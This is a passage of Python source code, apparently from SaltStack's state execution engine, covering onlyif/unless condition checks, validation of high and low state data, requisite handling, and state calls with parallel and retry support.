low_data_onlyif = low_data["onlyif"]
def _check_cmd(cmd):
if cmd != 0 and ret["result"] is False:
ret.update(
{
"comment": "onlyif condition is false",
"skip_watch": True,
"result": True,
}
)
elif cmd == 0:
ret.update({"comment": "onlyif condition is true", "result": False})
for entry in low_data_onlyif:
if isinstance(entry, str):
try:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
except CommandExecutionError:
# Command failed, notify onlyif to skip running the item
cmd = 100
log.debug("Last command return code: %s", cmd)
_check_cmd(cmd)
elif isinstance(entry, dict):
if "fun" not in entry:
ret["comment"] = "no `fun` argument in onlyif: {}".format(entry)
log.warning(ret["comment"])
return ret
get_return = entry.pop("get_return", None)
result = self._run_check_function(entry)
if get_return:
result = salt.utils.data.traverse_dict_and_list(result, get_return)
if self.state_con.get("retcode", 0):
_check_cmd(self.state_con["retcode"])
elif not result:
ret.update(
{
"comment": "onlyif condition is false",
"skip_watch": True,
"result": True,
}
)
else:
ret.update({"comment": "onlyif condition is true", "result": False})
else:
ret.update(
{
"comment": "onlyif execution failed, bad type passed",
"result": False,
}
)
return ret
def _run_check_unless(self, low_data, cmd_opts):
"""
        Check that unless doesn't return 0 (the state is skipped if it does).
"""
ret = {"result": False}
if not isinstance(low_data["unless"], list):
low_data_unless = [low_data["unless"]]
else:
low_data_unless = low_data["unless"]
def _check_cmd(cmd):
if cmd == 0 and ret["result"] is False:
ret.update(
{
"comment": "unless condition is true",
"skip_watch": True,
"result": True,
}
)
elif cmd != 0:
ret.update({"comment": "unless condition is false", "result": False})
for entry in low_data_unless:
if isinstance(entry, str):
try:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
except CommandExecutionError:
# Command failed, so notify unless to skip the item
cmd = 0
_check_cmd(cmd)
elif isinstance(entry, dict):
if "fun" not in entry:
ret["comment"] = "no `fun` argument in unless: {}".format(entry)
log.warning(ret["comment"])
return ret
get_return = entry.pop("get_return", None)
result = self._run_check_function(entry)
if get_return:
result = salt.utils.data.traverse_dict_and_list(result, get_return)
if self.state_con.get("retcode", 0):
_check_cmd(self.state_con["retcode"])
elif result:
ret.update(
{
"comment": "unless condition is true",
"skip_watch": True,
"result": True,
}
)
else:
ret.update(
{"comment": "unless condition is false", "result": False}
)
else:
ret.update(
{
"comment": "unless condition is false, bad type passed",
"result": False,
}
)
# No reason to stop, return ret
return ret
def _run_check_cmd(self, low_data):
"""
Alter the way a successful state run is determined
"""
ret = {"result": False}
cmd_opts = {}
if "shell" in self.opts["grains"]:
cmd_opts["shell"] = self.opts["grains"].get("shell")
for entry in low_data["check_cmd"]:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
if cmd == 0 and ret["result"] is False:
ret.update(
{
"comment": "check_cmd determined the state succeeded",
"result": True,
}
)
elif cmd != 0:
ret.update(
{
"comment": "check_cmd determined the state failed",
"result": False,
}
)
return ret
return ret
def _run_check_creates(self, low_data):
"""
Check that listed files exist
"""
ret = {"result": False}
if isinstance(low_data["creates"], str) and os.path.exists(low_data["creates"]):
ret["comment"] = "{} exists".format(low_data["creates"])
ret["result"] = True
ret["skip_watch"] = True
elif isinstance(low_data["creates"], list) and all(
[os.path.exists(path) for path in low_data["creates"]]
):
ret["comment"] = "All files in creates exist"
ret["result"] = True
ret["skip_watch"] = True
else:
ret["comment"] = "Creates files not found"
ret["result"] = False
return ret
def reset_run_num(self):
"""
        Reset the run_num value to 0
"""
self.__run_num = 0
def _load_states(self):
"""
        Read the state loader value and load up the correct states subsystem
"""
if self.states_loader == "thorium":
self.states = salt.loader.thorium(
self.opts, self.functions, {}
) # TODO: Add runners, proxy?
else:
self.states = salt.loader.states(
self.opts,
self.functions,
self.utils,
self.serializers,
context=self.state_con,
proxy=self.proxy,
)
def load_modules(self, data=None, proxy=None):
"""
Load the modules into the state
"""
log.info("Loading fresh modules for state activity")
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts, self.state_con, utils=self.utils, proxy=self.proxy
)
if isinstance(data, dict):
if data.get("provider", False):
if isinstance(data["provider"], str):
providers = [{data["state"]: data["provider"]}]
elif isinstance(data["provider"], list):
providers = data["provider"]
else:
providers = {}
for provider in providers:
for mod in provider:
funcs = salt.loader.raw_mod(
self.opts, provider[mod], self.functions
)
if funcs:
for func in funcs:
f_key = "{}{}".format(mod, func[func.rindex(".") :])
self.functions[f_key] = funcs[func]
self.serializers = salt.loader.serializers(self.opts)
self._load_states()
self.rend = salt.loader.render(
self.opts,
self.functions,
states=self.states,
proxy=self.proxy,
context=self.state_con,
)
def module_refresh(self):
"""
Refresh all the modules
"""
log.debug("Refreshing modules...")
if self.opts["grains"].get("os") != "MacOS":
# In case a package has been installed into the current python
# process 'site-packages', the 'site' module needs to be reloaded in
# order for the newly installed package to be importable.
try:
reload_module(site)
            except (RuntimeError, TypeError):
                log.error(
                    "Error encountered during module reload. Modules were not reloaded."
                )
self.load_modules()
if not self.opts.get("local", False) and self.opts.get("multiprocessing", True):
self.functions["saltutil.refresh_modules"]()
def check_refresh(self, data, ret):
"""
Check to see if the modules for this state instance need to be updated,
only update if the state is a file or a package and if it changed
        something. If the file function is 'managed', check whether the file is a
        possible module type, e.g. a .py, .pyx, or .so file. Always refresh if the
        function is 'recurse', since that can lay down anything.
"""
_reload_modules = False
if data.get("reload_grains", False):
log.debug("Refreshing grains...")
self.opts["grains"] = salt.loader.grains(self.opts)
_reload_modules = True
if data.get("reload_pillar", False):
log.debug("Refreshing pillar...")
self.opts["pillar"] = self._gather_pillar()
_reload_modules = True
if not ret["changes"]:
if data.get("force_reload_modules", False):
self.module_refresh()
return
if data.get("reload_modules", False) or _reload_modules:
# User explicitly requests a reload
self.module_refresh()
return
if data["state"] == "file":
if data["fun"] == "managed":
if data["name"].endswith((".py", ".pyx", ".pyo", ".pyc", ".so")):
self.module_refresh()
elif data["fun"] == "recurse":
self.module_refresh()
elif data["fun"] == "symlink":
if "bin" in data["name"]:
self.module_refresh()
elif data["state"] in ("pkg", "ports", "pip"):
self.module_refresh()
def verify_data(self, data):
"""
Verify the data, return an error statement if something is wrong
"""
errors = []
if "state" not in data:
errors.append('Missing "state" data')
if "fun" not in data:
errors.append('Missing "fun" data')
if "name" not in data:
errors.append('Missing "name" data')
if data["name"] and not isinstance(data["name"], str):
errors.append(
"ID '{}' {}is not formed as a string, but is a {}".format(
data["name"],
"in SLS '{}' ".format(data["__sls__"]) if "__sls__" in data else "",
type(data["name"]).__name__,
)
)
if errors:
return errors
full = data["state"] + "." + data["fun"]
if full not in self.states:
if "__sls__" in data:
errors.append(
"State '{}' was not found in SLS '{}'".format(full, data["__sls__"])
)
reason = self.states.missing_fun_string(full)
if reason:
errors.append("Reason: {}".format(reason))
else:
errors.append("Specified state '{}' was not found".format(full))
else:
# First verify that the parameters are met
aspec = salt.utils.args.get_function_argspec(self.states[full])
arglen = 0
deflen = 0
if isinstance(aspec.args, list):
arglen = len(aspec.args)
if isinstance(aspec.defaults, tuple):
deflen = len(aspec.defaults)
for ind in range(arglen - deflen):
if aspec.args[ind] not in data:
errors.append(
"Missing parameter {} for state {}".format(
aspec.args[ind], full
)
)
# If this chunk has a recursive require, then it will cause a
# recursive loop when executing, check for it
reqdec = ""
if "require" in data:
reqdec = "require"
if "watch" in data:
            # Check to see if the state has a mod_watch function; if it does
            # not, convert the watch into a require by extending the require
            # statement with the contents of watch, so that mod_watch is not
            # called but the requisite behavior is still applied.
if "{}.mod_watch".format(data["state"]) not in self.states:
if "require" in data:
data["require"].extend(data.pop("watch"))
else:
data["require"] = data.pop("watch")
reqdec = "require"
else:
reqdec = "watch"
if reqdec:
for req in data[reqdec]:
reqfirst = next(iter(req))
if data["state"] == reqfirst:
if fnmatch.fnmatch(data["name"], req[reqfirst]) or fnmatch.fnmatch(
data["__id__"], req[reqfirst]
):
err = (
"Recursive require detected in SLS {} for"
" require {} in ID {}"
).format(data["__sls__"], req, data["__id__"])
errors.append(err)
return errors
def verify_high(self, high):
"""
Verify that the high data is viable and follows the data structure
"""
errors = []
if not isinstance(high, dict):
errors.append("High data is not a dictionary and is invalid")
reqs = OrderedDict()
for name, body in high.items():
try:
if name.startswith("__"):
continue
except AttributeError:
pass
if not isinstance(name, str):
errors.append(
"ID '{}' in SLS '{}' is not formed as a string, but "
"is a {}. It may need to be quoted.".format(
name, body["__sls__"], type(name).__name__
)
)
if not isinstance(body, dict):
err = "The type {} in {} is not formatted as a dictionary".format(
name, body
)
errors.append(err)
continue
for state in body:
if state.startswith("__"):
continue
if body[state] is None:
errors.append(
"ID '{}' in SLS '{}' contains a short declaration "
"({}) with a trailing colon. When not passing any "
"arguments to a state, the colon must be omitted.".format(
name, body["__sls__"], state
)
)
continue
if not isinstance(body[state], list):
errors.append(
"State '{}' in SLS '{}' is not formed as a list".format(
name, body["__sls__"]
)
)
else:
fun = 0
if "." in state:
fun += 1
for arg in body[state]:
if isinstance(arg, str):
fun += 1
if " " in arg.strip():
errors.append(
(
'The function "{}" in state '
'"{}" in SLS "{}" has '
"whitespace, a function with whitespace is "
"not supported, perhaps this is an argument "
'that is missing a ":"'
).format(arg, name, body["__sls__"])
)
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst == "names":
if not isinstance(arg[argfirst], list):
errors.append(
"The 'names' argument in state "
"'{}' in SLS '{}' needs to be "
"formed as a list".format(name, body["__sls__"])
)
if argfirst in ("require", "watch", "prereq", "onchanges"):
if not isinstance(arg[argfirst], list):
errors.append(
"The {} statement in state '{}' in "
"SLS '{}' needs to be formed as a "
"list".format(argfirst, name, body["__sls__"])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = OrderedDict(state=state)
for req in arg[argfirst]:
if isinstance(req, str):
req = {"id": req}
if not isinstance(req, dict):
err = (
"Requisite declaration {}"
" in SLS {} is not formed as a"
" single key dictionary"
).format(req, body["__sls__"])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if "." in req_key:
errors.append(
"Invalid requisite type '{}' "
"in state '{}', in SLS "
"'{}'. Requisite types must "
"not contain dots, did you "
"mean '{}'?".format(
req_key,
name,
body["__sls__"],
req_key[: req_key.find(".")],
)
)
if not ishashable(req_val):
errors.append(
(
'Illegal requisite "{}", '
"please check your syntax.\n"
).format(req_val)
)
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if (
reqs[req_val]["state"]
== reqs[name][req_val]
):
err = (
"A recursive "
"requisite was found, SLS "
'"{}" ID "{}" ID "{}"'
).format(
body["__sls__"],
name,
req_val,
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
"Multiple dictionaries defined in "
"argument of state '{}' in SLS '{}'".format(
name, body["__sls__"]
)
)
if not fun:
if state == "require" or state == "watch":
continue
errors.append(
"No function declared in state '{}' in SLS '{}'".format(
state, body["__sls__"]
)
)
elif fun > 1:
errors.append(
"Too many functions declared in state '{}' in "
"SLS '{}'".format(state, body["__sls__"])
)
return errors
def verify_chunks(self, chunks):
"""
Verify the chunks in a list of low data structures
"""
err = []
for chunk in chunks:
err.extend(self.verify_data(chunk))
return err
def order_chunks(self, chunks):
"""
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
"""
cap = 1
for chunk in chunks:
if "order" in chunk:
if not isinstance(chunk["order"], int):
continue
chunk_order = chunk["order"]
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if "order" not in chunk:
chunk["order"] = cap
continue
if not isinstance(chunk["order"], (int, float)):
if chunk["order"] == "last":
chunk["order"] = cap + 1000000
elif chunk["order"] == "first":
chunk["order"] = 0
else:
chunk["order"] = cap
if "name_order" in chunk:
chunk["order"] = chunk["order"] + chunk.pop("name_order") / 10000.0
if chunk["order"] < 0:
chunk["order"] = cap + 1000000 + chunk["order"]
chunks.sort(
key=lambda chunk: (
chunk["order"],
"{0[state]}{0[name]}{0[fun]}".format(chunk),
)
)
return chunks
def compile_high_data(self, high, orchestration_jid=None):
"""
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
"""
chunks = []
for name, body in high.items():
if name.startswith("__"):
continue
for state, run in body.items():
funcs = set()
names = []
if state.startswith("__"):
continue
chunk = {"state": state, "name": name}
if orchestration_jid is not None:
chunk["__orchestration_jid__"] = orchestration_jid
if "__sls__" in body:
chunk["__sls__"] = body["__sls__"]
if "__env__" in body:
chunk["__env__"] = body["__env__"]
chunk["__id__"] = name
for arg in run:
if isinstance(arg, str):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in arg.items():
if key == "names":
for _name in val:
if _name not in names:
names.append(_name)
elif key == "state":
# Don't pass down a state override
continue
elif key == "name" and not isinstance(val, str):
# Invalid name, fall back to ID
chunk[key] = name
else:
chunk[key] = val
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(iter(entry.keys()))
live["name"] = low_name
list(map(live.update, entry[low_name]))
else:
live["name"] = entry
live["name_order"] = name_order
name_order += 1
for fun in funcs:
live["fun"] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live["fun"] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def reconcile_extend(self, high):
"""
Pull the extend data and add it to the respective high data
"""
errors = []
if "__extend__" not in high:
return high, errors
ext = high.pop("__extend__")
for ext_chunk in ext:
for name, body in ext_chunk.items():
if name not in high:
state_type = next(x for x in body if not x.startswith("__"))
# Check for a matching 'name' override in high data
ids = find_name(name, state_type, high)
if len(ids) != 1:
errors.append(
"Cannot extend ID '{0}' in '{1}:{2}'. It is not "
"part of the high state.\n"
"This is likely due to a missing include statement "
"or an incorrectly typed ID.\nEnsure that a "
"state with an ID of '{0}' is available\nin "
"environment '{1}' and to SLS '{2}'".format(
name,
body.get("__env__", "base"),
body.get("__sls__", "base"),
)
)
continue
else:
name = ids[0][0]
for state, run in body.items():
if state.startswith("__"):
continue
if state not in high[name]:
high[name][state] = run
continue
# high[name][state] is extended by run, both are lists
for arg in run:
update = False
for hind in range(len(high[name][state])):
if isinstance(arg, str) and isinstance(
high[name][state][hind], str
):
# replacing the function, replace the index
high[name][state].pop(hind)
high[name][state].insert(hind, arg)
update = True
continue
if isinstance(arg, dict) and isinstance(
high[name][state][hind], dict
):
# It is an option, make sure the options match
argfirst = next(iter(arg))
if argfirst == next(iter(high[name][state][hind])):
# If argfirst is a requisite then we must merge
# our requisite with that of the target state
if argfirst in STATE_REQUISITE_KEYWORDS:
high[name][state][hind][argfirst].extend(
arg[argfirst]
)
                                    # otherwise, it's not a requisite and we are just extending (replacing)
else:
high[name][state][hind] = arg
update = True
if (
argfirst == "name"
and next(iter(high[name][state][hind])) == "names"
):
# If names are overwritten by name use the name
high[name][state][hind] = arg
if not update:
high[name][state].append(arg)
return high, errors
def apply_exclude(self, high):
"""
Read in the __exclude__ list and remove all excluded objects from the
high data
"""
if "__exclude__" not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop("__exclude__")
for exc in exclude:
if isinstance(exc, str):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(iter(exc.keys()))
if key == "sls":
ex_sls.add(exc["sls"])
elif key == "id":
ex_id.add(exc["id"])
# Now the excludes have been simplified, use them
if ex_sls:
# There are sls excludes, find the associated ids
for name, body in high.items():
if name.startswith("__"):
continue
sls = body.get("__sls__", "")
if not sls:
continue
for ex_ in ex_sls:
if fnmatch.fnmatch(sls, ex_):
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
def requisite_in(self, high):
"""
Extend the data reference with requisite_in arguments
"""
req_in = {
"require_in",
"watch_in",
"onfail_in",
"onchanges_in",
"use",
"use_in",
"prereq",
"prereq_in",
}
req_in_all = req_in.union(
{"require", "watch", "onfail", "onfail_stop", "onchanges"}
)
extend = {}
errors = []
disabled_reqs = self.opts.get("disabled_requisites", [])
if not isinstance(disabled_reqs, list):
disabled_reqs = [disabled_reqs]
for id_, body in high.items():
if not isinstance(body, dict):
continue
for state, run in body.items():
if state.startswith("__"):
continue
for arg in run:
if isinstance(arg, dict):
# It is not a function, verify that the arg is a
# requisite in statement
if len(arg) < 1:
# Empty arg dict
# How did we get this far?
continue
# Split out the components
key = next(iter(arg))
if key not in req_in:
continue
if key in disabled_reqs:
log.warning(
"The %s requisite has been disabled, Ignoring.", key
)
continue
rkey = key.split("_")[0]
items = arg[key]
if isinstance(items, dict):
# Formatted as a single req_in
for _state, name in items.items():
# Not a use requisite_in
found = False
if name not in extend:
extend[name] = OrderedDict()
if "." in _state:
errors.append(
"Invalid requisite in {}: {} for "
"{}, in SLS '{}'. Requisites must "
"not contain dots, did you mean '{}'?".format(
rkey,
_state,
name,
body["__sls__"],
_state[: _state.find(".")],
)
)
_state = _state.split(".")[0]
if _state not in extend[name]:
extend[name][_state] = []
extend[name]["__env__"] = body["__env__"]
extend[name]["__sls__"] = body["__sls__"]
for ind in range(len(extend[name][_state])):
if next(iter(extend[name][_state][ind])) == rkey:
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append({rkey: [{state: id_}]})
if isinstance(items, list):
# Formed as a list of requisite additions
hinges = []
for ind in items:
if not isinstance(ind, dict):
# Malformed req_in
if ind in high:
_ind_high = [
x
for x in high[ind]
if not x.startswith("__")
]
ind = {_ind_high[0]: ind}
else:
found = False
for _id in iter(high):
for state in [
state
for state in iter(high[_id])
if not state.startswith("__")
]:
for j in iter(high[_id][state]):
if (
isinstance(j, dict)
and "name" in j
):
if j["name"] == ind:
ind = {state: _id}
found = True
if not found:
continue
if len(ind) < 1:
continue
pstate = next(iter(ind))
pname = ind[pstate]
if pstate == "sls":
# Expand hinges here
hinges = find_sls_ids(pname, high)
else:
hinges.append((pname, pstate))
if "." in pstate:
errors.append(
"Invalid requisite in {}: {} for "
"{}, in SLS '{}'. Requisites must "
"not contain dots, did you mean '{}'?".format(
rkey,
pstate,
pname,
body["__sls__"],
pstate[: pstate.find(".")],
)
)
pstate = pstate.split(".")[0]
for tup in hinges:
name, _state = tup
if key == "prereq_in":
# Add prerequired to origin
if id_ not in extend:
extend[id_] = OrderedDict()
if state not in extend[id_]:
extend[id_][state] = []
extend[id_][state].append(
{"prerequired": [{_state: name}]}
)
if key == "prereq":
# Add prerequired to prereqs
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if ext_id not in extend:
extend[ext_id] = OrderedDict()
if _req_state not in extend[ext_id]:
extend[ext_id][_req_state] = []
extend[ext_id][_req_state].append(
{"prerequired": [{state: id_}]}
)
continue
if key == "use_in":
# Add the running states args to the
# use_in states
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if not ext_id:
continue
ext_args = state_args(ext_id, _state, high)
if ext_id not in extend:
extend[ext_id] = OrderedDict()
if _req_state not in extend[ext_id]:
extend[ext_id][_req_state] = []
ignore_args = req_in_all.union(ext_args)
for arg in high[id_][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(iter(arg.keys())) == "name":
continue
if next(iter(arg.keys())) == "names":
continue
extend[ext_id][_req_state].append(arg)
continue
if key == "use":
# Add the use state's args to the
# running state
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if not ext_id:
continue
loc_args = state_args(id_, state, high)
if id_ not in extend:
extend[id_] = OrderedDict()
if state not in extend[id_]:
extend[id_][state] = []
ignore_args = req_in_all.union(loc_args)
for arg in high[ext_id][_req_state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(iter(arg.keys())) == "name":
continue
if next(iter(arg.keys())) == "names":
continue
extend[id_][state].append(arg)
continue
found = False
if name not in extend:
extend[name] = OrderedDict()
if _state not in extend[name]:
extend[name][_state] = []
extend[name]["__env__"] = body["__env__"]
extend[name]["__sls__"] = body["__sls__"]
for ind in range(len(extend[name][_state])):
if (
next(iter(extend[name][_state][ind]))
== rkey
):
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append({rkey: [{state: id_}]})
high["__extend__"] = []
for key, val in extend.items():
high["__extend__"].append({key: val})
req_in_high, req_in_errors = self.reconcile_extend(high)
errors.extend(req_in_errors)
return req_in_high, errors
def _call_parallel_target(self, name, cdata, low):
"""
The target function to call that will create the parallel thread/process
"""
# we need to re-record start/end duration here because it is impossible to
# correctly calculate further down the chain
utc_start_time = datetime.datetime.utcnow()
self.format_slots(cdata)
tag = _gen_tag(low)
try:
ret = self.states[cdata["full"]](*cdata["args"], **cdata["kwargs"])
except Exception as exc: # pylint: disable=broad-except
log.debug(
"An exception occurred in this state: %s",
exc,
exc_info_on_loglevel=logging.DEBUG,
)
trb = traceback.format_exc()
ret = {
"result": False,
"name": name,
"changes": {},
"comment": "An exception occurred in this state: {}".format(trb),
}
utc_finish_time = datetime.datetime.utcnow()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
ret["duration"] = duration
troot = os.path.join(self.opts["cachedir"], self.jid)
tfile = os.path.join(troot, salt.utils.hashutils.sha1_digest(tag))
if not os.path.isdir(troot):
try:
os.makedirs(troot)
except OSError:
# Looks like the directory was created between the check
# and the attempt, we are safe to pass
pass
with salt.utils.files.fopen(tfile, "wb+") as fp_:
fp_.write(msgpack_serialize(ret))
def call_parallel(self, cdata, low):
"""
Call the state defined in the given cdata in parallel
"""
# There are a number of possibilities to not have the cdata
# populated with what we might have expected, so just be smart
# enough to not raise another KeyError as the name is easily
        # guessable and fall back in all cases to present the real
# exception to the user
name = (cdata.get("args") or [None])[0] or cdata["kwargs"].get("name")
if not name:
name = low.get("name", low.get("__id__"))
proc = salt.utils.process.Process(
target=self._call_parallel_target, args=(name, cdata, low)
)
proc.start()
ret = {
"name": name,
"result": None,
"changes": {},
"comment": "Started in a separate process",
"proc": proc,
}
return ret
@salt.utils.decorators.state.OutputUnifier("content_check", "unify")
def call(self, low, chunks=None, running=None, retries=1):
"""
Call a state directly with the low data structure, verify data
before processing.
"""
utc_start_time = datetime.datetime.utcnow()
local_start_time = utc_start_time - (
datetime.datetime.utcnow() - datetime.datetime.now()
)
log.info(
"Running state [%s] at time %s",
low["name"].strip() if isinstance(low["name"], str) else low["name"],
local_start_time.time().isoformat(),
)
errors = self.verify_data(low)
if errors:
ret = {
"result": False,
"name": low["name"],
"changes": {},
"comment": "",
}
for err in errors:
ret["comment"] += "{}\n".format(err)
ret["__run_num__"] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
return ret
else:
ret = {"result": False, "name": low["name"], "changes": {}}
self.state_con["runas"] = low.get("runas", None)
if low["state"] == "cmd" and "password" in low:
self.state_con["runas_password"] = low["password"]
else:
self.state_con["runas_password"] = low.get("runas_password", None)
if not low.get("__prereq__"):
log.info(
"Executing state %s.%s for [%s]",
low["state"],
low["fun"],
low["name"].strip() if isinstance(low["name"], str) else low["name"],
)
if "provider" in low:
self.load_modules(low)
state_func_name = "{0[state]}.{0[fun]}".format(low)
cdata = salt.utils.args.format_call(
self.states[state_func_name],
low,
initial_ret={"full": state_func_name},
expected_extra_kws=STATE_INTERNAL_KEYWORDS,
)
inject_globals = {
# Pass a copy of the running dictionary, the low state chunks and
# the current state dictionaries.
# We pass deep copies here because we don't want any misbehaving
# state module to change these at runtime.
"__low__": immutabletypes.freeze(low),
"__running__": immutabletypes.freeze(running) if running else {},
"__instance_id__": self.instance_id,
"__lowstate__": immutabletypes.freeze(chunks) if chunks else {},
}
if "__env__" in low:
inject_globals["__env__"] = str(low["__env__"])
if self.inject_globals:
inject_globals.update(self.inject_globals)
if low.get("__prereq__"):
test = sys.modules[self.states[cdata["full"]].__module__].__opts__["test"]
sys.modules[self.states[cdata["full"]].__module__].__opts__["test"] = True
try:
# Let's get a reference to the salt environment to use within this
# state call.
#
# If the state function accepts an 'env' keyword argument, it
            # allows the state to be overridden (we look for that in cdata). If
# that's not found in cdata, we look for what we're being passed in
# the original data, namely, the special dunder __env__. If that's
# not found we default to 'base'
req_list = ("unless", "onlyif", "creates")
if (
any(req in low for req in req_list)
and "{0[state]}.mod_run_check".format(low) not in self.states
):
ret.update(self._run_check(low))
if not self.opts.get("lock_saltenv", False):
                # NOTE: Overriding the saltenv when lock_saltenv is set is
                # blocked in salt/modules/state.py before we ever get here,
                # but this additional check keeps uses of the State class
                # outside of salt/modules/state.py from getting around the
                # setting.
if "saltenv" in low:
inject_globals["__env__"] = str(low["saltenv"])
elif isinstance(cdata["kwargs"].get("env", None), str):
# User is using a deprecated env setting which was parsed by
# format_call.
# We check for a string type since module functions which
# allow setting the OS environ also make use of the "env"
# keyword argument, which is not a string
inject_globals["__env__"] = str(cdata["kwargs"]["env"])
if "__env__" not in inject_globals:
# Let's use the default environment
inject_globals["__env__"] = "base"
if "__orchestration_jid__" in low:
inject_globals["__orchestration_jid__"] = low["__orchestration_jid__"]
if "result" not in ret or ret["result"] is False:
self.states.inject_globals = inject_globals
if self.mocked:
ret = mock_ret(cdata)
else:
# Execute the state function
if not low.get("__prereq__") and low.get("parallel"):
# run the state call in parallel, but only if not in a prereq
ret = self.call_parallel(cdata, low)
else:
self.format_slots(cdata)
ret = self.states[cdata["full"]](
*cdata["args"], **cdata["kwargs"]
)
self.states.inject_globals = {}
if (
"check_cmd" in low
and "{0[state]}.mod_run_check_cmd".format(low) not in self.states
):
ret.update(self._run_check_cmd(low))
except Exception as exc: # pylint: disable=broad-except
log.debug(
"An exception occurred in this state: %s",
exc,
exc_info_on_loglevel=logging.DEBUG,
)
trb = traceback.format_exc()
# There are a number of possibilities to not have the cdata
# populated with what we might have expected, so just be smart
# enough to not raise another KeyError as the name is easily
            # guessable and fall back in all cases to present the real
# exception to the user
name = (cdata.get("args") or [None])[0] or cdata["kwargs"].get("name")
if not name:
name = low.get("name", low.get("__id__"))
ret = {
"result": False,
"name": name,
"changes": {},
"comment": "An exception occurred in this state: {}".format(trb),
}
finally:
if low.get("__prereq__"):
sys.modules[self.states[cdata["full"]].__module__].__opts__[
"test"
] = test
self.state_con.pop("runas", None)
self.state_con.pop("runas_password", None)
if not isinstance(ret, dict):
return ret
# If format_call got any warnings, let's show them to the user
if "warnings" in cdata:
ret.setdefault("warnings", []).extend(cdata["warnings"])
if "provider" in low:
self.load_modules()
if low.get("__prereq__"):
low["__prereq__"] = False
return ret
ret["__sls__"] = low.get("__sls__")
ret["__run_num__"] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
utc_finish_time = datetime.datetime.utcnow()
timezone_delta = datetime.datetime.utcnow() - datetime.datetime.now()
local_finish_time = utc_finish_time - timezone_delta
local_start_time = utc_start_time - timezone_delta
ret["start_time"] = local_start_time.time().isoformat()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
ret["duration"] = duration
ret["__id__"] = low["__id__"]
log.info(
"Completed state [%s] at time %s (duration_in_ms=%s)",
low["name"].strip() if isinstance(low["name"], str) else low["name"],
local_finish_time.time().isoformat(),
duration,
)
if "retry" in low:
low["retry"] = self.verify_retry_data(low["retry"])
if not sys.modules[self.states[cdata["full"]].__module__].__opts__["test"]:
if low["retry"]["until"] != ret["result"]:
if low["retry"]["attempts"] > retries:
interval = low["retry"]["interval"]
if low["retry"]["splay"] != 0:
interval = interval + random.randint(
0, low["retry"]["splay"]
)
log.info(
"State result does not match retry until value, "
"state will be re-run in %s seconds",
interval,
)
self.functions["test.sleep"](interval)
retry_ret = self.call(low, chunks, running, retries=retries + 1)
orig_ret = ret
ret = retry_ret
ret["comment"] = "\n".join(
[
(
'Attempt {}: Returned a result of "{}", '
'with the following comment: "{}"'.format(
retries, orig_ret["result"], orig_ret["comment"]
)
),
"" if not ret["comment"] else ret["comment"],
]
)
ret["duration"] = (
ret["duration"] + orig_ret["duration"] + (interval * 1000)
)
if retries == 1:
ret["start_time"] = orig_ret["start_time"]
else:
ret["comment"] = " ".join(
[
"" if not ret["comment"] else str(ret["comment"]),
(
"The state would be retried every {1} seconds "
"(with a splay of up to {3} seconds) "
"a maximum of {0} times or until a result of {2} "
"is returned"
).format(
low["retry"]["attempts"],
low["retry"]["interval"],
low["retry"]["until"],
low["retry"]["splay"],
),
]
)
return ret
def __eval_slot(self, slot):
log.debug("Evaluating slot: %s", slot)
fmt = slot.split(":", 2)
if len(fmt) != 3:
log.warning("Malformed slot: %s", slot)
return slot
if fmt[1] != "salt":
log.warning("Malformed slot: %s", slot)
log.warning(
"Only execution modules are currently supported in slots. This means slot "
'should start with "__slot__:salt:"'
)
return slot
fun, args, kwargs = salt.utils.args.parse_function(fmt[2])
if not fun or fun not in self.functions:
log.warning("Malformed slot: %s", slot)
log.warning(
"Execution module should be specified in a function call format: "
"test.arg('arg', kw='kwarg')"
)
return slot
log.debug("Calling slot: %s(%s, %s)", fun, args, kwargs)
slot_return = self.functions[fun](*args, **kwargs)
